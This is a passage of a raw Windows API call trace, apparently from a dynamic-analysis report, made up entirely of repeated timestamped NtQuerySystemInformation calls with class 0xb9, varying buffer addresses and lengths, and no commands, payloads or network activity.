(SystemInformationClass=0xb9, SystemInformation=0xa78207d2d0, Length=0x50, ResultLength=0x0) [0286.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0286.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d030, Length=0x28, ResultLength=0x0) [0286.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d030, Length=0x28, ResultLength=0x0) [0286.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d030, Length=0x28, ResultLength=0x0) [0286.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x28, ResultLength=0x0) [0286.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0286.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x28, ResultLength=0x0) [0286.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x28, ResultLength=0x0) [0286.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0286.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x20, ResultLength=0x0) [0286.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d000, Length=0x20, ResultLength=0x0) [0286.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d000, Length=0x20, ResultLength=0x0) [0286.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d000, Length=0x20, ResultLength=0x0) [0286.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d200, Length=0x38, ResultLength=0x0) [0286.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x20, ResultLength=0x0) [0286.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x20, ResultLength=0x0) [0286.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x20, ResultLength=0x0) [0286.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0286.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0286.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0286.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0286.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0286.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0286.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0286.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0286.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0286.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0286.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0286.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0286.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x28, ResultLength=0x0) [0286.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0286.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0286.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0286.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c890, Length=0x20, ResultLength=0x0) [0286.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0286.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0286.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0286.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0286.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0286.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c950, Length=0x20, ResultLength=0x0) [0286.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0286.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0286.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0286.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0286.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0286.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0286.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0286.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0286.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0286.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0286.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0286.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0286.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0286.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0286.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x28, ResultLength=0x0) [0286.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0286.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0286.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0286.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c890, Length=0x20, ResultLength=0x0) [0286.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0286.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0286.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0286.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0286.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0286.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c950, Length=0x20, ResultLength=0x0) [0286.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0286.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0286.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d270, Length=0x28, ResultLength=0x0) [0286.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0286.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0286.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0286.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0286.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0286.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0286.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0286.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x20, ResultLength=0x0) [0286.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x20, ResultLength=0x0) [0286.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0286.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0286.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0286.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfe0, Length=0x20, ResultLength=0x0) [0286.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfe0, Length=0x20, ResultLength=0x0) [0286.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0286.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0286.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0286.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x20, ResultLength=0x0) [0286.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x20, ResultLength=0x0) [0286.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x20, ResultLength=0x0) [0286.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0286.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x20, ResultLength=0x0) [0286.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d060, Length=0x20, ResultLength=0x0) [0286.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d060, Length=0x20, ResultLength=0x0) [0286.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0286.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0286.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0286.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 